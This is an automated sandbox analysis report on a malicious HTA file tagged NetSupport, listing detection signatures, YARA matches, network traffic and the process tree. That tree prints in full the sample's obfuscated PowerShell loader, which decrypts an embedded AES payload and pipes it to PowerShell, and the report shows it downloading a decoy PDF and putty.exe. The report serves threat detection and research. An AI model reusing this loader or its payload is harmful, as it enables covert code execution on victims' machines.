Windows Analysis Report
a913b6f2499bfbef318b948a278f0e441a5d6334752712d4f4539e72.hta

Overview

General Information

Sample Name: a913b6f2499bfbef318b948a278f0e441a5d6334752712d4f4539e72.hta
Analysis ID: 1320936
MD5: 24d2c1fc57fcced31089d89c8178605b
SHA1: b06f20ea60cbe3785a38702d8e2072aa5f0327ca
SHA256: 01a56c5b210084f1f6831c9b517bb3bd25564faeb0a2ca075d93027aa632f01b
Tags: hta, NetSupport

Detection

Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus detection for URL or domain
Very long command line found
Suspicious powershell command line found
Contains functionality to modify clipboard data
Suspicious command line found
Powershell drops PE file
Drops PE files to the user root directory
Found suspicious powershell code related to unpacking or dynamic code loading
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to read the clipboard data
Uses the system / local time for branch decision (may execute only at specific dates)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to retrieve information about pressed keystrokes
Checks for available system drives (often done to infect USB drives)
Drops PE files to the user directory
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • mshta.exe (PID: 2832 cmdline: mshta.exe "C:\Users\user\Desktop\a913b6f2499bfbef318b948a278f0e441a5d6334752712d4f4539e72.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • powershell.exe (PID: 4564 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $fNaPOP = 'AAAAAAAAAAAAAAAAAAAAAPq3+YYuESDCP30fCtt1g8+BllQDeEK2RL0/q2v+83d4BFFpsS5iJU6kFeS1JzaAIIjoFB3qbZ4arUa/P0A2xkjM5iuNW72eqrksKCnteMTJHARvOlHxtFF2Y5wz5P2jTj8qOAbDNBfSmoktklgidKmITv4Lcg8mILUKzUd9s+wKjzqzjTCjO/2G5KR/8OACyCs/NGTKY8euJIFd3JJz5ylYW3oFjpf3MJ9CzN20cb8PHYfovW8CHT0xnVzCfmgO/E8zd5ZqzfWG7smpcDA2ExuZDGAJGu5tHHWB7zEHt3D3piB67d6q7vHJNkGbSIV6zCPOFIP7s25z6l2WgczC+2l0H4WG5atfmshceYxBLkJmL3+4vdT9rw3zEp3Gp2C/Hy8udbeID77xXgK3+QrDNhAlxW7kxAFq6B8jYiFfP3403hxtqvgrEaHvVf8Yj2RvMsbDjplrnScmvGd9IqA7OxvubNuWW9u2M23JiSeSQ4uZ7NhkFBozi8YuXfaIrOonGW7TY7XUD6uPRXjTiAwNNNS2sAQk/oKX7moMS6bGVr3YYH/SG2sq5Kq7RYEJPk4BTIkllKdMILZqNu8d/Xf1CeZAopnM27zbagY2uYzvLziepNimUT6TKFecr+KQcrmydbFCsk/3RbYPdZNEoDmRrJZuEJPSkcyj60Ix9eVqYbKTMtPkyyT4yGrR/6uU6i+3tYlLQXZjJHNnGBzyXVXwMnYs9nzNdpphf2bMYeLnENNqsNg8rs0j4jTd9OzOJo6orWXFY54hD1OMI8Rzby565/grQubRf9KNj3pkkKx5LO7JjjkdA49ARW/YGaIvigRgvZKfqOLkwINuh3agYb/7frzuyKeLCzmwXHR7gPJmxmpop3ScsHlT6P522CVJacLhmbxH8EbVj89KLiG5DnG0o1y0kV3zJ8QKXZcmfiHT+wA0P7c89p9Ihf41CM6quS0cjzqXJH76OPrm8iujlCD9SmMxUkrE8SoPlRjE+s8rbdTv';$mehLaZDc = 'd2Z5WFdPd1VKSXdqYXNCRnhTRWRuSFBtZGJqWlFTSXo=';$PYLEHHT = New-Object 'System.Security.Cryptography.AesManaged';$PYLEHHT.Mode = [System.Security.Cryptography.CipherMode]::ECB;$PYLEHHT.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$PYLEHHT.BlockSize = 128;$PYLEHHT.KeySize = 256;$PYLEHHT.Key = [System.Convert]::FromBase64String($mehLaZDc);$BWoPS = [System.Convert]::FromBase64String($fNaPOP);$MkdtxWXs = $BWoPS[0..15];$PYLEHHT.IV = $MkdtxWXs;$IaLmFBNdk = $PYLEHHT.CreateDecryptor();$MvUYGVuHe = $IaLmFBNdk.TransformFinalBlock($BWoPS, 16, $BWoPS.Length - 16);$PYLEHHT.Dispose();$cxVQsOlZ = New-Object System.IO.MemoryStream( , $MvUYGVuHe );$kPnxbBu = New-Object System.IO.MemoryStream;$uGBpShIzT = New-Object 
System.IO.Compression.GzipStream $cxVQsOlZ, ([IO.Compression.CompressionMode]::Decompress);$uGBpShIzT.CopyTo( $kPnxbBu );$uGBpShIzT.Close();$cxVQsOlZ.Close();[byte[]] $bsMmu = $kPnxbBu.ToArray();$FPimSbR = [System.Text.Encoding]::UTF8.GetString($bsMmu);$FPimSbR | powershell - } MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 4208 cmdline: "C:\Windows\system32\cmd.exe" /c powershell.exe $fNaPOP = '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';$mehLaZDc = 'd2Z5WFdPd1VKSXdqYXNCRnhTRWRuSFBtZGJqWlFTSXo=';$PYLEHHT = New-Object 'System.Security.Cryptography.AesManaged';$PYLEHHT.Mode = [System.Security.Cryptography.CipherMode]::ECB;$PYLEHHT.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$PYLEHHT.BlockSize = 128;$PYLEHHT.KeySize = 256;$PYLEHHT.Key = [System.Convert]::FromBase64String($mehLaZDc);$BWoPS = [System.Convert]::FromBase64String($fNaPOP);$MkdtxWXs = $BWoPS[0..15];$PYLEHHT.IV = $MkdtxWXs;$IaLmFBNdk = $PYLEHHT.CreateDecryptor();$MvUYGVuHe = $IaLmFBNdk.TransformFinalBlock($BWoPS, 16, $BWoPS.Length - 16);$PYLEHHT.Dispose();$cxVQsOlZ = New-Object System.IO.MemoryStream( , $MvUYGVuHe );$kPnxbBu = New-Object System.IO.MemoryStream;$uGBpShIzT = New-Object System.IO.Compression.GzipStream $cxVQsOlZ, ([IO.Compression.CompressionMode]::Decompress);$uGBpShIzT.CopyTo( $kPnxbBu );$uGBpShIzT.Close();$cxVQsOlZ.Close();[byte[]] $bsMmu = $kPnxbBu.ToArray();$FPimSbR = [System.Text.Encoding]::UTF8.GetString($bsMmu);$FPimSbR | powershell - MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 5292 cmdline: powershell.exe $fNaPOP = 'AAAAAAAAAAAAAAAAAAAAAPq3+YYuESDCP30fCtt1g8+BllQDeEK2RL0/q2v+83d4BFFpsS5iJU6kFeS1JzaAIIjoFB3qbZ4arUa/P0A2xkjM5iuNW72eqrksKCnteMTJHARvOlHxtFF2Y5wz5P2jTj8qOAbDNBfSmoktklgidKmITv4Lcg8mILUKzUd9s+wKjzqzjTCjO/2G5KR/8OACyCs/NGTKY8euJIFd3JJz5ylYW3oFjpf3MJ9CzN20cb8PHYfovW8CHT0xnVzCfmgO/E8zd5ZqzfWG7smpcDA2ExuZDGAJGu5tHHWB7zEHt3D3piB67d6q7vHJNkGbSIV6zCPOFIP7s25z6l2WgczC+2l0H4WG5atfmshceYxBLkJmL3+4vdT9rw3zEp3Gp2C/Hy8udbeID77xXgK3+QrDNhAlxW7kxAFq6B8jYiFfP3403hxtqvgrEaHvVf8Yj2RvMsbDjplrnScmvGd9IqA7OxvubNuWW9u2M23JiSeSQ4uZ7NhkFBozi8YuXfaIrOonGW7TY7XUD6uPRXjTiAwNNNS2sAQk/oKX7moMS6bGVr3YYH/SG2sq5Kq7RYEJPk4BTIkllKdMILZqNu8d/Xf1CeZAopnM27zbagY2uYzvLziepNimUT6TKFecr+KQcrmydbFCsk/3RbYPdZNEoDmRrJZuEJPSkcyj60Ix9eVqYbKTMtPkyyT4yGrR/6uU6i+3tYlLQXZjJHNnGBzyXVXwMnYs9nzNdpphf2bMYeLnENNqsNg8rs0j4jTd9OzOJo6orWXFY54hD1OMI8Rzby565/grQubRf9KNj3pkkKx5LO7JjjkdA49ARW/YGaIvigRgvZKfqOLkwINuh3agYb/7frzuyKeLCzmwXHR7gPJmxmpop3ScsHlT6P522CVJacLhmbxH8EbVj89KLiG5DnG0o1y0kV3zJ8QKXZcmfiHT+wA0P7c89p9Ihf41CM6quS0cjzqXJH76OPrm8iujlCD9SmMxUkrE8SoPlRjE+s8rbdTv';$mehLaZDc = 'd2Z5WFdPd1VKSXdqYXNCRnhTRWRuSFBtZGJqWlFTSXo=';$PYLEHHT = New-Object 'System.Security.Cryptography.AesManaged';$PYLEHHT.Mode = [System.Security.Cryptography.CipherMode]::ECB;$PYLEHHT.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$PYLEHHT.BlockSize = 128;$PYLEHHT.KeySize = 256;$PYLEHHT.Key = [System.Convert]::FromBase64String($mehLaZDc);$BWoPS = [System.Convert]::FromBase64String($fNaPOP);$MkdtxWXs = $BWoPS[0..15];$PYLEHHT.IV = $MkdtxWXs;$IaLmFBNdk = $PYLEHHT.CreateDecryptor();$MvUYGVuHe = $IaLmFBNdk.TransformFinalBlock($BWoPS, 16, $BWoPS.Length - 16);$PYLEHHT.Dispose();$cxVQsOlZ = New-Object System.IO.MemoryStream( , $MvUYGVuHe );$kPnxbBu = New-Object System.IO.MemoryStream;$uGBpShIzT = New-Object System.IO.Compression.GzipStream $cxVQsOlZ, ([IO.Compression.CompressionMode]::Decompress);$uGBpShIzT.CopyTo( $kPnxbBu );$uGBpShIzT.Close();$cxVQsOlZ.Close();[byte[]] 
$bsMmu = $kPnxbBu.ToArray();$FPimSbR = [System.Text.Encoding]::UTF8.GetString($bsMmu);$FPimSbR MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • powershell.exe (PID: 5224 cmdline: powershell - MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • Acrobat.exe (PID: 1840 cmdline: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Research.pdf MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
            • AcroCEF.exe (PID: 3324 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
              • AcroCEF.exe (PID: 5196 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2128 --field-trial-handle=1564,i,7959819648417443592,3997577616809760479,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
          • putty.exe (PID: 7236 cmdline: "C:\Users\user\putty.exe" MD5: 7A0DFC5353FF6DE7DE0208A29FA2FFC9)
  • cleanup
No configs have been found
Source: Process Memory Space: powershell.exe PID: 4564
Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC
Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Author: ditekSHen
Strings:
  • 0x2879:$b2: ::FromBase64String(
  • 0x28ae:$b2: ::FromBase64String(
  • 0x1aa9c:$b2: ::FromBase64String(
  • 0x1aad3:$b2: ::FromBase64String(
  • 0x1d042:$b2: ::FromBase64String(
  • 0x1d079:$b2: ::FromBase64String(
  • 0x252ea:$b2: ::FromBase64String(
  • 0x25321:$b2: ::FromBase64String(
  • 0x338e4:$b2: ::FromBase64String(
  • 0x3391b:$b2: ::FromBase64String(
  • 0x3489b:$b2: ::FromBase64String(
  • 0x348d2:$b2: ::FromBase64String(
  • 0x36cf5:$b2: ::FromBase64String(
  • 0x36d2a:$b2: ::FromBase64String(
  • 0x3753d:$b2: ::FromBase64String(
  • 0x37572:$b2: ::FromBase64String(
  • 0x16c03f:$b2: ::FromBase64String(
  • 0x16c076:$b2: ::FromBase64String(
  • 0x173d20:$b2: ::FromBase64String(
  • 0x173d57:$b2: ::FromBase64String(
  • 0x1c12d3:$b2: ::FromBase64String(
Source: Process Memory Space: powershell.exe PID: 5292
Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC
Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Author: ditekSHen
Strings:
  • 0x976a4:$b1: ::WriteAllBytes(
  • 0xa5830:$b1: ::WriteAllBytes(
  • 0x18cafc:$b1: ::WriteAllBytes(
  • 0x18d17c:$b1: ::WriteAllBytes(
  • 0x18dc84:$b1: ::WriteAllBytes(
  • 0x15ae9:$b2: ::FromBase64String(
  • 0x15b20:$b2: ::FromBase64String(
  • 0x16371:$b2: ::FromBase64String(
  • 0x163a8:$b2: ::FromBase64String(
  • 0x16b53:$b2: ::FromBase64String(
  • 0x16b8a:$b2: ::FromBase64String(
  • 0x2eedb:$b2: ::FromBase64String(
  • 0x2ef10:$b2: ::FromBase64String(
  • 0x2f68b:$b2: ::FromBase64String(
  • 0x2f6c0:$b2: ::FromBase64String(
  • 0x356ad:$b2: ::FromBase64String(
  • 0x356e4:$b2: ::FromBase64String(
  • 0x35ead:$b2: ::FromBase64String(
  • 0x35ee4:$b2: ::FromBase64String(
  • 0x999d8:$b2: ::FromBase64String(
  • 0x99a0d:$b2: ::FromBase64String(
No Sigma rule has matched
No Snort rule has matched

AV Detection

Source: a913b6f2499bfbef318b948a278f0e441a5d6334752712d4f4539e72.hta ReversingLabs: Detection: 21%
Source: a913b6f2499bfbef318b948a278f0e441a5d6334752712d4f4539e72.hta Virustotal: Detection: 30%
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe File opened: z:
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe File opened: x:
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe File opened: v:
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe File opened: t:
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe File opened: r:
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe File opened: p:
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe File opened: n:
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe File opened: l:
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe File opened: j:
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe File opened: h:
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe File opened: f:
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe File opened: b:
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe File opened: y:
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe File opened: w:
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe File opened: u:
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe File opened: s:
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe File opened: q:
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe File opened: o:
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe File opened: m:
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe File opened: k:
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe File opened: i:
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe File opened: g:
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe File opened: e:
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: c:
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe File opened: a:
Source: C:\Users\user\putty.exe Code function: 10_2_004486F8 GetWindowsDirectoryA,FindFirstFileA,FindNextFileA,FindClose,GetCurrentProcessId,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: global traffic HTTP traffic detected: GET /Research.pdf HTTP/1.1 Host: 45.9.190.201 Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /~sgtatham/putty/0.63/x86/putty.exe HTTP/1.1 Host: the.earth.li Connection: Keep-Alive
Source: Joe Sandbox View IP Address: 93.93.131.124
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 06 Oct 2023 13:30:12 GMTServer: ApacheLast-Modified: Tue, 06 Aug 2013 17:32:58 GMTETag: "79000-4e34ad0df95b5"Accept-Ranges: bytesContent-Length: 495616Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6e 1f 98 4b 2a 7e f6 18 2a 7e f6 18 2a 7e f6 18 39 76 9f 18 28 7e f6 18 2f 72 96 18 28 7e f6 18 2f 72 f9 18 31 7e f6 18 39 76 ab 18 28 7e f6 18 d0 5d ef 18 2e 7e f6 18 a9 76 ab 18 3b 7e f6 18 2a 7e f7 18 1a 7f f6 18 2f 72 a9 18 96 7e f6 18 c6 75 a8 18 2b 7e f6 18 2f 72 ac 18 2b 7e f6 18 52 69 63 68 2a 7e f6 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 86 2e 01 52 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 07 0a 00 60 05 00 00 60 02 00 00 00 00 00 25 f1 04 00 00 10 00 00 00 70 05 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 d0 07 00 00 10 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 28 0c 07 00 f0 00 00 00 00 90 07 00 90 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0b 07 00 48 00 00 00 00 00 00 00 00 00 00 00 00 70 05 00 d4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b1 5f 05 00 00 10 00 00 00 60 05 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 2a b6 01 00 00 70 05 00 00 c0 01 00 00 70 
05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c4 58 00 00 00 30 07 00 00 20 00 00 00 30 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 90 3b 00 00 00 90 07 00 00 40 00 00 00 50 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: unknown TCP traffic detected without corresponding DNS query: 45.9.190.201
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: powershell.exe, 00000005.00000002.1423096498.0000000007430000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000001.00000002.1404886400.00000000057E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1420106740.0000000005948000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000005.00000002.1410247548.0000000004A38000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1398594979.0000000004781000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1410247548.00000000048E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.1410247548.0000000004A38000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: putty.exe, putty.exe, 0000000A.00000000.1459240905.0000000000457000.00000002.00000001.01000000.0000000B.sdmp, putty.exe, 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp, putty.exe.6.dr String found in binary or memory: http://www.chiark.greenend.org.uk/~sgtatham/putty/
Source: putty.exe, 0000000A.00000000.1459240905.0000000000457000.00000002.00000001.01000000.0000000B.sdmp, putty.exe, 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp, putty.exe.6.dr String found in binary or memory: http://www.chiark.greenend.org.uk/~sgtatham/putty/PuTTYConfigBoxj
Source: powershell.exe, 00000001.00000002.1398594979.0000000004781000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1410247548.00000000048E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000005.00000002.1420106740.0000000005948000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.1420106740.0000000005948000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.1420106740.0000000005948000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000005.00000002.1410247548.0000000004A38000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000005.00000002.1410247548.0000000004A38000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000001.00000002.1404886400.00000000057E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1420106740.0000000005948000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: unknown DNS traffic detected: queries for: the.earth.li
Source: C:\Users\user\putty.exe Code function: 10_2_00448111 recv

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\user\putty.exe Code function: 10_2_0043F872 GlobalAlloc,GlobalLock,GlobalUnlock,SendMessageA,SendMessageA,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,GlobalFree,SendMessageA
Source: C:\Users\user\putty.exe Code function: 10_2_0043F91B WideCharToMultiByte,GlobalAlloc,GlobalAlloc,GlobalAlloc,GlobalFree,GlobalLock,GlobalLock,GlobalFree,GlobalFree,GlobalFree,GlobalLock,GlobalUnlock,WideCharToMultiByte,_strlen,_strlen,_strcat,WideCharToMultiByte,_strcat,_strcat,_strcat,GlobalAlloc,GlobalLock,GlobalUnlock,GlobalUnlock,GlobalUnlock,GlobalUnlock,SendMessageA,SendMessageA,OpenClipboard,EmptyClipboard,SetClipboardData,SetClipboardData,SetClipboardData,RegisterClipboardFormatA,SetClipboardData,CloseClipboard,GlobalFree,GlobalFree,GlobalFree,SendMessageA,GlobalFree,GlobalFree
Source: C:\Users\user\putty.exe Code function: 10_2_00440064 OpenClipboard,GetClipboardData,GetClipboardData,GetClipboardData,SendMessageA,CloseClipboard
Source: C:\Users\user\putty.exe Code function: 10_2_004424A0 SetWindowTextA,SetWindowTextA,SetWindowTextA,PostQuitMessage,CreateCaret,ShowCaret,MessageBoxA,DestroyWindow,HideCaret,BeginPaint,SelectPalette,RealizePalette,SelectObject,CreateSolidBrush,SelectObject,CreatePen,SelectObject,IntersectClipRect,ExcludeClipRect,Rectangle,SelectObject,DeleteObject,DeleteObject,SelectObject,DeleteObject,GetStockObject,GetStockObject,SelectObject,GetStockObject,SelectObject,EndPaint,ShowCaret,DestroyCaret,TranslateMessage,EnableMenuItem,IsZoomed,IsZoomed,ShowWindow,DeleteObject,IsZoomed,GetWindowLongA,GetWindowLongA,GetWindowLongA,SetWindowPos,SetWindowPos,SetWindowLongA,SetWindowLongA,SetWindowPos,IsZoomed,IsIconic,SetWindowTextA,InvalidateRect,SendMessageA,PostMessageA,CreateFileMappingA,MapViewOfFile,UnmapViewOfFile,GetModuleFileNameA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CloseHandle,ImmGetContext,ImmGetCompositionStringW,ImmGetCompositionStringW,ImmReleaseContext,ImmGetContext,ImmSetCompositionFontA,ImmReleaseContext,KillTimer,GetCursorPos,TrackPopupMenu,GetCapture,GetScrollInfo,InvalidateRect,InvalidateRect,GetCursorPos,SendMessageA,SetCapture,ReleaseCapture,RealizePalette,UpdateColors,RealizePalette,UpdateColors,DefWindowProcA,GetKeyboardState,ScreenToClient

System Summary

Source: Process Memory Space: powershell.exe PID: 4564, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5292, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\SysWOW64\mshta.exe Process created: Commandline size = 2215
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 2096
Source: C:\Windows\SysWOW64\cmd.exe Process created: Commandline size = 2048
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\putty.exe
Source: Process Memory Space: powershell.exe PID: 4564, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5292, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: C:\Users\user\putty.exeCode function: 10_2_0045203A10_2_0045203A
Source: C:\Users\user\putty.exe | Code function: 10_2_004010F6
Source: C:\Users\user\putty.exe | Code function: 10_2_004250FD
Source: C:\Users\user\putty.exe | Code function: 10_2_00421160
Source: C:\Users\user\putty.exe | Code function: 10_2_0041C168
Source: C:\Users\user\putty.exe | Code function: 10_2_0042E12C
Source: C:\Users\user\putty.exe | Code function: 10_2_0042125E
Source: C:\Users\user\putty.exe | Code function: 10_2_00424277
Source: C:\Users\user\putty.exe | Code function: 10_2_00431219
Source: C:\Users\user\putty.exe | Code function: 10_2_00420237
Source: C:\Users\user\putty.exe | Code function: 10_2_0043423E
Source: C:\Users\user\putty.exe | Code function: 10_2_00451280
Source: C:\Users\user\putty.exe | Code function: 10_2_00420348
Source: C:\Users\user\putty.exe | Code function: 10_2_00435355
Source: C:\Users\user\putty.exe | Code function: 10_2_00415405
Source: C:\Users\user\putty.exe | Code function: 10_2_0041F40F
Source: C:\Users\user\putty.exe | Code function: 10_2_004424A0
